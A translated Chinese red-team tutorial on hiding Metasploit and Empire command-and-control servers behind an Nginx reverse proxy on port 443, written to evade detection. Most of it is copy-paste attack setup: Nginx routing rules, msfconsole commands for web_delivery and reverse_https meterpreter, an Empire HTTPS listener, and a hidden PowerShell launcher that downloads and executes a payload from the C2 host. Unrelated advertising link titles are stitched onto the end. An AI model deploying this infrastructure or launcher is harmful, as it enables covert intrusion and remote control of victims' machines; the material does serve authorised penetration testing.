文章插图
翻译:WisFree
预估稿费:200RMB(不服你也来投稿啊!)
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
基础知识
目前流行的指挥控制(CC)工具大多通过HTTP传输网络通信数据,如Metasploit和Empire 。对于CC工具来说,HTTP协议是比较高效的选择,主要是因为它适用于目前几乎所有类型的通信网络和网络设备 。此外,使用“HTTPoverTLS”可以为这些工具增加额外的安全层,因为这项技术将使我们更难检测CC流量 。如果企业或组织有正确配置的网络代理,该代理可以执行SSL/TLS检查,这将有助于安全技术人员更好地检测CC流量 。然而,在我帮助测试的组织中,采取这种安全措施的并不多 。
为了掩盖所有非法操作,通过HTTP协议传输的CC流量应该通过端口80或端口443发送 。如果用8080这样的特殊端口发送CC数据,不仅会引起管理员的怀疑,还会逃过安全防护软件的检测 。我个人喜欢在同一台主机上使用多种类型的工具 。如果我想在一台主机上使用帝国和Metasploit的网络传输模块,我总共需要三个网络端口 。一般来说,我会选择使用端口80、端口8080和端口443 。但是现在,我希望所有的网络流量都通过端口443发送 。因此,我现在将使用剑盾提供的安全分析服务,这样我就可以使用CC代理来完成所有的分析操作 。
接下来,我计划使用Nginx构建一个反向代理服务器 。如下图所示,我们可以使用一个Web服务器同时处理多用户多工具的情况 。代理服务器配置完成后,代理规则将负责划分发送到C2服务器端口的流量 。此外,这种配置还可以隐藏CC服务器的“真实身份”(实际主机) 。Nginx不仅安装配置非常简单,操作起来也非常方便 。多用户多工具CC代理的架构图如下图所示:
文章插图
Nginx的安装与配置
【代理服务器ip地址和端口号,代理服务器】首先,在VPS服务器上安装你喜欢的Linux发行版,如果你愿意,也可以安装在自己的服务器上 。为了大家的方便,我选择在一台VPS主机上安装Ubuntu16.10 。如果学生在安装和操作Nginx时遇到困难,请参考本教程【教程获取】 。配置后,我的服务器只启用了端口80,只允许通过端口443发送网络流量 。
在测试开始之前,我们必须配置Nginx,否则代理服务器将不知道如何处理那些通信连接 。为了防止暴力攻击,我们需要为每个分析器分配一个GUID 。您可以单击此处生成相应的GUID 。我生成的GUID如下表所示:
文章插图
我总共设置了三个分析器,每一个分析器的相关配置信息如下所示:
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657
#Analyst 1
location /E0922BB0-684B-4ED3-967E-85D08880CFD5/ {
proxy_redirect off;
#Empire
location /E0922BB0-684B-4ED3-967E-85D08880CFD5/e/ {
proxy_pass https://205.232.71.92:443;
}
#Metasploit
location /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/ {
#Metasploit exploit/multi/script/web_delivery
location /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Delivery {
proxy_pass https://205.232.71.92:8080;
}
#Metasploit Payload windows/x64/meterpreter/reverse_https
location /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Pwned {
proxy_pass https://205.232.71.92:80;
}
}
}
#Analyst 2
location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/ {
proxy_redirect off;
#Empire
location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/e/ {
proxy_pass https://1.2.3.5:443;
}
#Metasploit
location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/m/ {
#Metasploit exploit/multi/script/web_delivery
location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/m/Delivery {
proxy_pass https://1.2.3.5:8080;
}
#Metasploit Payload windows/x64/meterpreter/reverse_https
location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/m/Pwned {
proxy_pass https://1.2.3.5:80;
}
}
}
#Analyst 3
location /6012A46E-C00C-4816-9DEB-7B2697667D92/ {
proxy_redirect off;
#Empire
location /6012A46E-C00C-4816-9DEB-7B2697667D92/e/ {
proxy_pass https://1.2.3.6:443;
}
#Metasploit
location /6012A46E-C00C-4816-9DEB-7B2697667D92/m/ {
#Metasploit exploit/multi/script/web_delivery
location /6012A46E-C00C-4816-9DEB-7B2697667D92/m/Delivery {
proxy_pass https://1.2.3.6:8080;
}
#Metasploit Payload windows/x64/meterpreter/reverse_https
location /6012A46E-C00C-4816-9DEB-7B2697667D92/m/Pwned {
proxy_pass https://1.2.3.6:80;
}
}
}
由于我们要让Nginx需要区分出Metasploit和Empire的请求,所以我突发奇想,打算用‘m’来代表Metasploit,用‘e’来代表Empire 。Empire的C2请求如下所示:1
https://myc2proxy.com/E0922BB0-684B-4ED3-967E-85D08880CFD5/e/index.asp
现在,既然我们已经可以确定传入的HTTP请求所使用的语句了,那么Nginx就需要将每一个请求转发至适当的分析代理服务器中,这项操作可以使用Nginx配置文件(/etc/nginx/sites-enabled/default)中的定位指令来完成 。在这篇文章中,我们要为每一个分析器分别设置四个定位指令 。在上面这段代码中,最外层的指令将会与分析器的GUID进行匹配 。内层的定位指令主要用来匹配针对特定工具的请求,例如‘e’(Empire)和‘m’(Metasploit) 。Metasploit的定位指令包含两个子定位指令,这两个指令可以用来匹配传入Metasploit特定模块和监听器的网络请求 。现在,C&C代理服务器应该配置完成并且可以正常运行了 。如果配置无误的话,我们将只能使用TLS连接和端口443来与服务器进行通信 。
Metasploit的安装与配置
众所周知,Metasploit提供了很多的功能模块,我们可以使用这些模块来与目标用户的计算机建立C2连接 。我个人比较喜欢使用“exploit/multi/script/web_delivery”模块来作为launcher 。我之所以非常喜欢这个模块,主要是因为它可以将meterpreter(ShellCode)注入至目标主机的内存中 。这是一种非常理想的情况,因为你可以直接使用目标主机中的内置工具来进行操作,而不必向目标主机发送任何的文件 。
接下来,我们要加载Nginx配置文件所需要使用的Metasploit模块,并使用URIPATH来对其进行设置 。需要注意的是,自带的payload handler必须被禁用,因为我们要单独配置这些payload 。在配置这个模块的过程中,payload使用的是“windows/x64/meterpreter/reverse_https”,然后将LHOST和LPORT设置为C2代理服务器的IP地址和端口号 。请注意,这里可千万不要设置成后台C2服务器的IP地址了 。除此之外,我们还要设置与payload(例如Pwned)和Nginx中的指令相匹配的LURI 。虽然相应的监听器根本不会启动,但我们仍然要去配置这些payload 。因为接下来当模块被执行之后,我们要使用这些设置来生成显示在屏幕中的启动命令 。我们可以将下面给出的这段指令直接复制粘贴到msfconsole中来配置并启动该模块:
12345678910
use exploit/multi/script/web_delivery
set URIPATH /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Delivery
set DisablePayloadHandler true
set SSL True
set TARGET 2
set payload windows/x64/meterpreter/reverse_https
set LHOST myc2proxy.com
set LPORT 443
set LURI /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Pwned
run –j
下图显示的是Metasploit中web_delivery模块的配置信息:文章插图
当模块被执行后,屏幕中会显示一个包含有启动代码的字符串 。请注意:必须将网络端口由8080改为443,否则之后将无法再进行修改了 。除此之外,我们还必须手动去修改,因为我们的C2代理只会接受来自端口443的通信请求 。这个字符串如下所示:
1
powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$o=new-object net.webclient;$o.proxy=[Net.WebRequest]::GetSystemWebProxy();$o.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $o.downloadstring('https://myc2proxy.com:8080/E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Delivery');
接下来,将LHOST设置为0.0.0.0,LPORT设置为80(端口号的设置可以根据后台C2服务器来选择) 。我们还需要配置OverrideLHOST、OverrideLPORT、以及OverrideRequestHost来确保payload可以直接与C2代理服务器进行对话 。我们可以将下面给出的命令直接复制粘贴到msfconsole中来配置并启动该模块:12345678910
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 80
set LURI /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Pwned
set OverrideLHOST myc2proxy.com
set OverrideLPORT 443
set OverrideRequestHost true
set ExitOnSession false
run –j
下图显示的是reverse_https的payload配置信息:文章插图
Empire的安装与配置
虽然Empire是我最喜欢的一款工具,但是在配置代理服务器的过程中,使用Empire之前还是有几个障碍需要克服的,相比之下Metasploit的配置和使用就简单多了 。在PowerShell v1中,初始链接序列所使用STAGE0、STAGE1和STAGE2是在empire.db的配置表中定义的 。在我看来,我们是无法在Empire CLI中修改这部分数据的,所以我们必须直接手动修改数据库 。但是,PowerShell Empire v2并没有使用这种架构 。我建议各位同学使用git来下载Empire v2分支,命令如下:
1
cd /opt;git clone -b 2.0_beta https://github.com/adaptivethreat/Empire.git
下载完成之后,启动应用 。由于Empire监听器所使用的端口必须与C2代理服务器的监听端口相同,所以Empire必须使用端口443和HTTPS协议 。我们可以直接将下面给出的这段命令复制粘贴进Empire中来配置监听器:123456789
listeners
uselistener http
set DefaultProfile /E0922BB0-684B-4ED3-967E-85D08880CFD5/e/admin/get.php,/E0922BB0-684B-4ED3-967E-85D08880CFD5/e/news.asp,/E0922BB0-684B-4ED3-967E-85D08880CFD5/e/login/process.jsp|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0;rv:11.0) like Gecko
set Name EmpireC2
set CertPath /opt/Empire/data/empire.pem
set Host https://myc2proxy.com
set Port 443
execute
launcher powershell
Empire监听器的配置信息如下图所示:文章插图
执行
现在,我们已经为Nginx C2代理配置好了一个用于分析数据流量的后台C2服务器了 。接下来,我们要在测试主机中执行我们所生成的其中一个launcher,你将会在后台C2服务器中看到测试主机的shell 。为了增加安全措施,配置后台C2服务器只允许当前C2代理访问 。
结论
代理可以用来保持后台服务的匿名性 。当你需要在某个网络中进行命令控制活动时,代理所提供的这种特性是非常有用的 。由于HTTPS的通信数据足够安全,因此现在越来越多的网络都开始使用HTTPS来进行通信了 。但是,这也将有助于我们躲避安全产品的检测 。
- 口头馋槟榔是正规厂家么,伍子醉枸杞槟榔代理商加盟
- 初感避孕套多少钱一盒 初感怎么加入代理
- 家装加盟 饮料招代理商
- 加盟超市有哪些品牌 日用品招商加盟代理厂家
- 代理记账年度工作总结 代理记账工作内容
- 休闲食品代理招商网 休闲零食小吃代理招商
- 2021年饮料招商网,二三线饮料品牌饮料代理
- 2020新上市饮料代理,78创业商机网
- 免费一件代发正规平台 代理一件代发免费货源
- 电脑怎么查看ip地址?众所周知|电脑怎么查看ip地址?